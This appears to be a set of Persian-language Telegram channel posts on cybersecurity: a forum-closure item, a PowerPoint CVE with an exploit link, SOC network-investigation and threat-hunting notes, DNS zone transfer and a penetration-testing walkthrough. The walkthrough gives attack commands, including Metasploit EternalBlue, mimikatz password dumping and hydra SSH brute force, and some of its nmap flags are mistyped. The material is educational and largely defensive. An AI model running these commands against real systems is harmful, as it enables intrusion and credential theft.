xss.is
بسته شد🧨

این فروم خفن روسی که همه‌ی کرکرها و هکرهای درست‌درمون توش می‌چرخیدن و هرچی ابزار و دیتای هکی و اکسپلویت و اینا بود میذاشتن، الان دیگه نیستش. یه مدت پیش همون‌طور که خبر اومد، یکی از کله‌گنده‌هاش رو گرفتن، پلیس فرانسه و یوروپل ریختن سرشون، بعدش یا خودشون فرومو بستن که گیر نیفتن یا کلاً سرورها رو خوابوندن و کل اون جامعه‌ی زیرزمینی یه‌دفعه از هم پاشید.

🚨 CVE‑2025‑47175

📌 اجرای کد بدون کلیک تو PowerPoint: فقط با باز کردن یه فایل PPTX مخرب تو PowerPoint 2019 یا Office 365، مهاجم می‌تونه کنترل سیستم رو بگیره بدون نیاز به هیچ کار اضافه‌ای.

باگ از نوع Use-After-Free تو هندل کردن فایل‌های PowerPoint باعث این آسیب‌پذیری شده.
ترجیحا پاورپوینتتون اپدیت کنید.

⚔️ اکسپلویت:
https://www.exploit-db.com/exploits/52351

تحقیقات شبکه (Network Investigation) یکی از ارکان کلیدی در فرآیند شناسایی و مقابله با بدافزارها است. بدافزارها معمولاً برای برقراری ارتباط با سرورهای فرمان و کنترل (C\&C)، ارسال داده‌های سرقت شده، یا دریافت دستورات، نیازمند تعامل با شبکه هستند. در این مقاله، بر اساس سناریوی عملی، روش‌ها و ابزارهای کلیدی برای شناسایی رفتارهای مخرب از طریق تحلیل شبکه هستش

چرا تحقیقات شبکه مهمه؟

بررسی ترافیک شبکه به تحلیلگر کمک می‌کند فعالیت‌های مخفی بدافزار رو کشف بکنه ، حتی وقتی آنتی‌ویروس‌ها موفق به شناسایی نشن
تحلیل بسته‌های شبکه (Packet Analysis) اطلاعات دقیق درباره مقصد، نوع داده‌های رد و بدل شده، و پروتکل‌ها ارائه می‌دهد.
کشف الگوهای غیرعادی مثل ارتباط با آی‌پی‌های ناشناس، پورت‌های غیرمعمول و دامنه‌های مشکوک.


جمع‌آوری داده‌های شبکه (Data Collection)

Packet Capture:
ابزارهایی مثل Wireshark، tcpdump، یا Network Miner برای ضبط و تحلیل بسته‌های شبکه استفاده میشن
NetFlow/sFlow:
جمع‌آوری داده‌های خلاصه جریان شبکه برای مشاهده الگوهای رفتاری بدون نیاز به ذخیره بسته‌های کامل و سبک
Firewall & Proxy Logs:
ثبت لاگ‌های فایروال و پراکسی که معمولاً درخواست‌های خروجی و ورودی را ردیابی می‌کنن
DNS Logs:
لاگ‌های DNS می‌توانند کمک کنند تا دامنه‌های غیرمعمول یا دامنه‌های ایجاد شده (DGA) شناسایی بشن

شناسایی ترافیک مشکوک

پورت‌های غیرمعمول: در سناریوی ما، پورت‌های ۸۰ (HTTP)، ۸۰۹۰ و ۸۰۸۸ مورد استفاده قرار گرفته‌ان وجود ارتباط روی پورت‌های غیررایج هشداردهنده است
ارتباط با دامنه‌های ناشناس: آدرس‌هایی مثل www1-google-analytics.com:8088 و midnitemeerkats.com که شباهت به دامنه‌های معتبر ندارند.
ترافیک رمزگذاری شده و Base64: اگر داده‌ها رمزگذاری شده یا در قالب Base64 باشند، ممکن است تلاش برای پنهان‌سازی اطلاعات باشد.
فعالیت‌های اسکن یا ارتباطات غیرمعمول: حجم بالا یا درخواست‌های مکرر به سرورهای خارجی که مشکوک میتونه باشه


تحلیل عملی سناریو فرضی

در این سناریو، ترافیک مشکوک توسط بدافزار به چندین پورت متفاوت ارسال شد که نشان از چندکاناله بودن ارتباط یا تغییر مسیر (Fallback) رو داره
دامنه midnitemeerkats.com جهت نمایش یادداشت باج‌افزاری استفاده شده که می‌توانه نشانگر مرحله حمله باشه
استفاده از پورت‌های غیرمعمول مانند ۸۰۸۸ یک روش معمول برای مخفی نگه داشتن ارتباطات بدافزار است

ابزارهای کلیدی تحقیقات شبکه

Wireshark:
برای ضبط و بررسی بسته‌های شبکه، فیلترگذاری ترافیک و شناسایی ارتباطات مشکوک
tcpdump:
ابزار خط فرمانی سبک برای ضبط بسته‌ها در سیستم‌های یونیکس‌مانند.
Zeek (Bro):
تحلیلگر شبکه که قابلیت تشخیص حملات و رفتارهای غیرعادی رو داره
VirusTotal (Network Submission):
ارسال فایل‌ها یا آدرس‌های شبکه برای بررسی سریع توسط آنتی‌ویروس‌های متعدد.
Hybrid Analysis:
برای تحلیل رفتاری فایل‌ها در محیط‌های شبیه‌سازی شده و مشاهده ترافیک تولید شده.


نکات مهم برای SOC Tier 1 در تحقیقات شبکه

همیشه ابتدا رفتار ترافیک شبکه را بر اساس الگوهای معمول محیط کاری خود بشناسید تا بتوانید موارد غیرعادی رو تشخیص دهید.
فیلتر کردن ترافیک خروجی به سمت آدرس‌های خارجی ناشناس یا غیرعادی را به عنوان هشدار در نظر بگیرید.
ترکیب داده‌های لاگ‌ها و تحلیل بسته‌ها کمک می‌کند تا به درک دقیق‌تری از فعالیت مخرب برسید.
ارتباط با تیم‌های دیگر مثل Memory Investigation و Malware Investigation برای رسیدن به تصویر کامل حمله ضروریه
همیشه نمونه‌های مشکوک را در محیط‌های ایزوله یا ماشین‌های مجازی امن تحلیل کنید.



اقدامات پس از شناسایی بدافزار از طریق شبکه

مسدود کردن دامنه‌ها یا IPهای مشکوک در فایروال‌ها
قرنطینه سیستم‌های آلوده و قطع ارتباط آنها از شبکه
بررسی روندهای انتقال داده و توقف ارتباطات مخرب
تحلیل بیشتر با ابزارهای تخصصی و به‌روزرسانی قوانین سیستم‌های تشخیص نفوذ (IDS/IPS)
مستندسازی یافته‌ها و گزارش به تیم‌های بالاتر و مدیریت برای اقدامات بعدی



https://news.1rj.ru/str/ViperNull

🧧Response code HTTP STATUS🧧

100-199 informetion (اطلاعات سایت)
200-299 ok (سایت باز شد)
300-399 redirect(ریدایرکت شده به یه سایت دیگه)
400-499 erore client side (مثال ارور 404)
500-599 erore server side (مثال ارور 503)

https://news.1rj.ru/str/ViperNull

برای تست نفوذ شبکه و تجهیزات معمولاً چند مسیر مشخص داریم که باید مرحله به مرحله جلو بریم.



🔹 ۱. شناسایی (Enumeration & Recon)

اول باید شبکه و تجهیزات هدف رو شناسایی کنیم.

# پینگ برای بررسی فعال بودن هاست
ping -c 4 192.168.1.1

# شناسایی سرویس‌ها و پورت‌ها با Nmap
nmap -sS -sV -O 192.168.1.0/24

# اسکن برای پورت‌های باز سریع
nmap -p- --open -T4 192.168.1.10

# شناسایی سیستم‌عامل
nmap -O 192.168.1.10

# شناسایی ورژن سرویس‌ها
nmap -sV 192.168.1.10

🔸 هدف: پیدا کردن پورت‌های باز، سرویس‌های فعال و سیستم‌عامل دستگاه‌ها.




🔹 ۲. کشف آسیب‌پذیری (Vulnerability Scanning)

بعد از شناسایی سرویس‌ها، باید ببینیم چه ضعف‌هایی وجود داره.

# اسکن آسیب‌پذیری با Nmap Script Engine (NSE)
nmap --noscript vuln 192.168.1.10

# استفاده از Nikto برای شناسایی وب‌سرورها
nikto -h http://192.168.1.20

# استفاده از OpenVAS یا GVM
gvm-cli socket --xml "<get_tasks/>"

🔸 هدف: پیدا کردن باگ‌های شناخته‌شده و کانفیگ‌های ضعیف.




🔹 ۳. اکسپلویت (Exploitation)


وقتی ضعف پیدا شد، تست بهره‌برداری می‌کنیم (با مجوز).

# اجرای متاسپلویت
msfconsole

# سرچ اکسپلویت برای سرویس
search smb

# ست کردن هدف
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.1.10
run

🔸 هدف: بررسی اینکه ضعف امنیتی واقعاً قابل سوءاستفاده هست یا نه.




🔹 ۴. پس از نفوذ (Post-Exploitation)

اگر نفوذ موفقیت‌آمیز بود، تست می‌کنیم که دسترسی تا کجا قابل گسترش هست.

# گرفتن اطلاعات سیستم
systeminfo

# لیست کاربران
net user

# دسترسی به پسوردهای ذخیره‌شده
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

🔸 هدف: بررسی سطح دسترسی، جمع‌آوری اطلاعات بیشتر و شناسایی خطرات.




🔹 ۵. تست تجهیزات شبکه (Router, Switch, Firewall)

روی تجهیزات شبکه هم تست‌های خاص انجام میشه:

# بررسی SNMP
nmap -sU -p 161 192.168.1.1 --noscript=snmp*

# بررسی Telnet/SSH باز بودن
nmap -p 22,23 192.168.1.1

# تست رمزهای ضعیف روی SSH

hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1

🔸 هدف: بررسی تنظیمات پیش‌فرض و پسوردهای ضعیف.

@kali_signal

ابزار SpiderFoot دستیار خفن جمع‌آوری اطلاعات متن‌باز در امنیت سایبری


اصلا ابزار SpiderFoot چی هستش؟

یه ابزار فوق‌العاده که اتوماتیکه و کمک می‌کنه اطلاعات عمومی و باز (Open Source Intelligence یا OSINT) رو درباره یه دامنه، ایمیل، IP و ... جمع‌آوری کنیم.
به جای اینکه ساعت‌ها با موتورهای جستجو و سایت‌های مختلف وقت بذاری، SpiderFoot همه‌چیز رو سریع میره و جمع میکنه

دقیقا چیکار می‌کنه؟

از کلی پلاگین (ماژول) استفاده میکنه که هر کدوم بخشی از اطلاعات رو استخراج می‌کنن؛ مثلاً:

نام‌های دامنه مرتبط
آدرس‌های ایمیل کارکنان
فناوری‌های استفاده شده تو سایت
داده‌های شبکه و سرورها
  و کلی چیز دیگه

کاربردش چیه؟

تو تست نفوذ، تحلیل امنیتی، و حتی تحقیقات دیجیتال خیلی به درد میخوره. فرض کنید میخواین بدونین یه شرکت یا سایت چقدر اطلاعات ازش بیرون ریخته و چقدر تو فضای عمومی قابل دسترسیه. خب پس بدرد فیلد بلو هم میخوره

نکات مهم درباره سروصدا و دیده شدن این ابزار بخام‌بگم

SpiderFoot
زیاد سر و صدا نمیکنه، چون از منابع عمومی و API استفاده میکنه،
ولی اگر پلاگین‌ها زیاد باشن تعداد درخواست‌ها بالا میره و ممکنه ردپایی بزاره. البته به هیچ وجه شبیه یه حمله مستقیم نیستش.

محدودیت‌ها و ریسک‌هایی که ممکنه به وجود بیاد

همه اطلاعاتی که میخواد جمع کنه همیشه کامل و به‌روز نیست
بعضی سایت‌ها یا سرویس‌ها ممکنه دسترسی رو محدود کنن
اگر ندانسته استفاده بکنیم ممکنه اطلاعات حساس یا خصوصی رو بیرون بده که خطرساز میشه

https://news.1rj.ru/str/ViperNull

DNS Zone Transfer
چیست و چطور می‌توان آن را تشخیص داد؟

قبل از هر چیز یک توضیح کوتاه درباره DNS بدم :
DNS یا Domain Name System
سرویس اصلی اینترنت برای تبدیل نام دامنه به IP هستش. وقتی شما می‌خواهید وارد مثلاً example.com شوید، کامپیوتر شما نمی‌تواند مستقیم نام دامنه را بفهمد و به آن متصل شود، چون پروتکل اینترنت فقط با IP کار می‌کند. DNS مثل یک دفترچه تلفن اینترنتی عمل می‌کنه که IP متناظر با هر دامنه رو برمیگردونه

هر سایت روی اینترنت یک یا چند DNS سرور دارد که مسئول ارائه این اطلاعات هستن. وقتی مدیر سایت، اطلاعات دامنه خود را روی DNS سرور قرار می‌دهد، این اطلاعات در دسترس کاربران قرار می‌گیره. اما بعضی وقتا برخی از ساب‌دامین‌ها یا اطلاعات حساس به اشتباه روی DNS سرور تعریف میشن و ممکن است توسط یک مهاجم قابل دسترسی باشن

Zone Transfer
چیست؟

Zone Transfer یا AXFR
یک فرایند در DNS است که برای کپی کردن تمام اطلاعات یک دامنه از یک DNS سرور استفاده می‌شود

به زبان ساده بخام بگم

یک مهاجم می‌توانه از طریق Zone Transfer کل دایره‌المعارف DNS یک دامنه شامل تمام ساب‌دامین‌هاش رکوردهای MX، A، TXT و غیره رو بدست بیاره
اما یه نکته این فرایند اکثراً موفق نیست چون اکثر DNS سرورها با پالیسی‌های امنیتی درست تنظیم شده‌اند و Zone Transfer به درخواستهای ناشناس پاسخ نمیده
اما با این حال  برخی DNS سرورهای ضعیف یا بد پیکربندی شده  به اشتباه اطلاعات را در اختیار مهاجم قرار میدن

یه مثال عملی بخام بگم

فرض کنید می‌خوایم برای دامنه zonetransfer.me
سرورهای DNS رو پیدا کنیم و Zone Transfer رو تست کنیم

1 ابتدا لیست سرورهای معتبر رو پیدا می‌کنیم:

dig +short NS zonetransfer.me
این دستور نام DNS سرورهای دامنه را برمیگردونه مثال بزنم

nsztm1.dnsowl.com
nsztm2.dnsowl.com
سپس تلاش می‌کنیم Zone Transfer انجام بدیم

dig @nsztm1.dnsowl.com zonetransfer.me AXFR
اگر سرور به درستی پیکربندی شده باشد، معمولاً خطای دسترسی دریافت می‌کنیم و عملیات ناموفق است. اما اگر سرور ضعیف باشد، تمام رکوردهای دامنه نمایش داده می‌شود.

نکات مهم برای SOC

برای SOC (Security Operations Center)
Zone Transfer
می‌تواند هم تهدید باشد و هم منبع اطلاعات مفید برای کشف مشکلات امنیتی:

شناسایی فعالیت مشکوک:

   درخواست‌های AXFR از منابع خارجی میتواند نشانه تلاش مهاجم برای جمع‌آوری اطلاعات باشن
ثبت لاگ‌های DNS برای تحلیل چنین فعالیت‌هایی ضروریه

پالیسی‌ها :

اطمینان از اینکه Zone Transfer فقط بین DNSهای داخلی انجام میشه و برای عموم مسدود هستش
بررسی و محدود کردن دسترسی به سرویس‌های DNS در فایروال و ACL

تست‌های امنیتی داخلی:

تست‌های دوره‌ای Zone Transfer روی سرورهای داخلی برای شناسایی مشکلات پیکربندی قبل از نفوذ مهاجم
   استفاده از ابزارهایی مثل dig یا اسکریپت‌های خودکار برای کشف رکوردهای غیرمجاز

هشدار و واکنش:

   هرگونه تلاش برای Zone Transfer از منابع غیرمجاز باید به سرعت به تیم SOC اطلاع داده بشه
میتوان سیستم هشدار خودکار برای ترافیک DNS غیرمعمول راه‌اندازی بکنیم

https://news.1rj.ru/str/ViperNull

برای دیدن یه نمونه باحال از XSS با عکس و متادیتا (EXIF) این مقاله رو حتما بخونین :
https://shahjerry33.medium.com/xss-via-exif-data-the-p2-elevator-d09e7b7fe9b9



https://news.1rj.ru/str/ViperNull

سلام و درود
شب بخیر
امروز سر کار بحث فنی بسیار جالبی و آموزنده ای داشتیم در خصوص شکار تهدیدات، حیفم آمد به اشتراک نذارم:

ما شکار تهدیدات رو به دو بخش تقسیم کردیم:
structured و unstructured!

شکار ساختار یافته (structured) مبتنی بر evidence هست. حالا این evidence میتونه یک ioa باشه، یه گزارش ti باشه، خروجی فعالیت purple teaming باشه.

شکار بدون ساختار (unstructured) مبتنی بر دیتا هست. حالا این دیتا میتونه از گزارشات امنیتی، از ti که هنوز تبدیل به Detection rule نشده، گزارشات red team، از حتی اخبار امنیتی باشه.

جفت این مدل‌ها، مارو هدايت میکنه سمت ایجاد فرضیه!

حالا این فرضیه میتونه بصورت ساختار یافته تو شبکه جستجو شه با اسکوپ مشخص (معمولا mitre att&ck رو به عنوان چارچوب کار انتخاب می‌کنند و متمرکز روی post exploitation)!
یا
فرضیه بدون ساختار خاصی و مبتنی بر discovery انجام شده پای مثلا یک سیستم ادامه پیدا کنه!

حالا این وسط soc میگه منم دارم فرایند Purple teaming رو میبرم جلو! ضعف هام رو شناسایی میکنم و براشون Detection rule مینویسم! از طرفی اگر هم visibility gap داشته باشم، اونم از گزارشات red team که purple teaming پردازش میکنه agent روش نصب میکنم و پوشش میدم! این وسط یه سوال ایجاد میشه که: چرا باید Hunting داشته باشیم؟ احیانا overlap نداره کارها؟ تو نگاه اول، claim بسیار منطقی هست! من خودم عمیق به فکر فرو رفتم! واقعا چرا hunting میخواهیم؟ نکنه overlap داریم واقعا؟!

برای پاسخ به این سوال، اول باید بفهمیم رویکرد hunting چیه؟ اون چیزی که من متوجه شدم از hunting، این هست که فعالیتی‌ست proactive جهت یافتن شواهد یا دیتایی از تهدیدات با پیش‌فرض دور خوردن مکانیزم‌های امنیتی!
از نگاه threat hunting، تمامی Detection rule ها، قابلیت دور خوردن دارند! حتی اونایی که با * نوشته شدن😁!

شکار هست که این گپ‌هارو کاور کنه و در نهایت کمک کنه به detection بهتر به عنوان یک لایه دیگه!

چرا یه لایه دیگه میخواهیم؟ بخاطر defense in depth؟
شاید اگر ‌کتاب Time-Based Security رو میخوندیم یا خلاصه ای که مهندس مولایی عزیز برای تنبل‌هایی مثل من گذاشته یه نگاهی بندازیم: معماری امن میگه شما باید معادله‌ی p>d+r رو برقرار کنی برای سیستم! وگرنه امنیت شما زیر سوال خواهد بود!
مثال بزنم:
اگر p که نشان از protection داره ۲ ساعت بتونه جلوی حملات سایبری دووم بیاره، یا اینطوری نگاهش کنیم که ۲ ساعت طول میکشه که دورش بزنن، سرعت detection و response ما باید الزاما زیر ۱ ساعت و ۵۹ دقیقه باشه که بتونیم ادعا کنیم سیستم امن مونده!

حالا سوال: چقدر طول میکشه قوانین detection ما دور بخوره؟
کی قراره این تیکه رو کاور کنه و proactice بگرده تو شبکه دنبال همین شواهد؟
کجا بهتر از soc میتونه از خروجی شکار نفع ببره؟
شکار تهدیدات به عنوان یک بازوی عملیاتی proactive برای soc میتونه تو کاهش سرعت detection تاثیر بسزایی در بهبود عملکرد soc داشته باشه!

برای شکار، visibility حرف اول رو میزنه! جایی که visibility نباشه، صِرف نصب کردن agent شما به detection نمیرسی! اگر اینطوری بود که همه agent نصب می‌کردند و امن می‌شدند و detection برقرار میشد براشون! برای تمام‌ حملات میشه detection نوشت؟ اگر اوکیه که من تمام detection ruleهای دنیا رو میدم بهتون بزنید تو سامانه‌هاتون و برید خونه بخوابید راحت!
این نگاه رو شما هم بهش فکر کنید نظر بدید!

یادمون نره نگاه شکار تهدیدات بر این مبنا بود که Detection های ما توسط مهاجم همین الان bypass شده!

این نتیجه‌ای بود که ما بعد از ۲ ساعت جلسه فنی سنگین با همکارامون گرفتیم!
حالا منتظر نظرات و ایده‌هاتون هستم ببینم کجای راه رو سمت شکار تهدیدات اشتباه رفتیم، اصلاحش کنیم!